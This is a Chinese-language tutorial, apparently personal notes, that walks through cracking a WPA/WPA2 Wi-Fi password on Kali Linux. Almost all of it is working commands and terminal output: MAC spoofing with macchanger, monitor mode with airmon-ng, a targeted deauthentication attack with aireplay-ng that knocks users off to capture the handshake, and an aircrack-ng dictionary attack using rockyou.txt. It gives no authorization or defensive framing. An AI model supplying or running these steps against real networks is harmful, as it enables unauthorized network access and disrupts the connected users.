WPA/WPA2无线网络破解
1.设置网络状态
# iwconfig
2.查看无线网卡
# airmon-ng
3.修改无线网卡MAC地址
# airmon-ng stop wlan0mon
- 之前启动了监听模式 先关闭
# macchanger --mac 7c:dd:90:ae:88:99 wlan0
[ERROR] Could not change MAC: interface up or insufficient permissions: Device or resource busy
# ifconfig wlan0 down
# macchanger --mac 7c:dd:90:ae:88:99 wlan0
New MAC: 7c:dd:90:ae:88:99 (Shenzhen Ogemray Technology Co., Ltd.)
# macchanger --mac 7c:dd:90:ae:88:99 wlan0
4.启用无线网卡监听模式
# airmon-ng start wlan0
5.查看附近无线网卡
# airodump-ng wlan0mon
- 终端1
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
路由器MAC地址 值越小信号越强 传输的数据 信号频道 wifi名称
6.获取需要破解的无线网卡数据包
# airodump-ng -c 1 -w wpa --bssid 00:11:22:33:44:55 wlan0mon
- 重新打开一个终端2
- -c 为频道
7.获取握手包
强制客户端重新连接WIFI
新建一个窗口3
# aireplay-ng -0 3 -a BC:46:99:E9:1A:7C -c 90:AD:F7:57:E5:58 wlan0mon
-0 使用deauth攻击模式
3 攻击次数3次
-a ap的mac地址(路由器)
-c 客户端mac (用户mac)
root@kali:~# aireplay-ng -0 3 -a BC:46:99:E9:1A:7C -c 90:AD:F7:57:E5:58 wlan0mon
19:08:17 Waiting for beacon frame (BSSID: 6C:59:40:91:EE:B4) on channel 9
19:08:19 wlan0mon is on channel 9, but the AP uses channel 13
- 报错 再重新执行几次
root@kali:~# aireplay-ng -0 3 -a BC:46:99:E9:1A:7C -c 90:AD:F7:57:E5:58 wlan0mon
19:39:17 Waiting for beacon frame (BSSID: 6C:59:40:91:EE:B4) on channel 13
19:39:18 Sending 64 directed DeAuth. STMAC: [34:08:BC:EE:3B:B6] [ 0| 0 ACKs]
19:39:19 Sending 64 directed DeAuth. STMAC: [34:08:BC:EE:3B:B6] [ 2| 1 ACKs]
19:39:19 Sending 64 directed DeAuth. STMAC: [34:08:BC:EE:3B:B6] [ 0| 0 ACKs]
- 查看终端1 第一行结尾显示WPA handshake
WPA handshake: 6C:59:40:91:EE:B4
8.使用字典暴力破解
- 可以中止 终端1、2 运行的命令,打开终端4
/usr/share/wordlists
# gunzip rockyou.txt.gz
WPA handshake 已经成功获取握手包,当前目录下生成.cap文件
# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-04.cap
-w 字典路径
参考:
1.Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)
2.使用Aircrack&hashcat破解WPA/WPA2
3.Hashcat——Cracking WPA2 WPA with Hashcat in Kali Linux
4.WPA-PSK无线网络破解原理及过程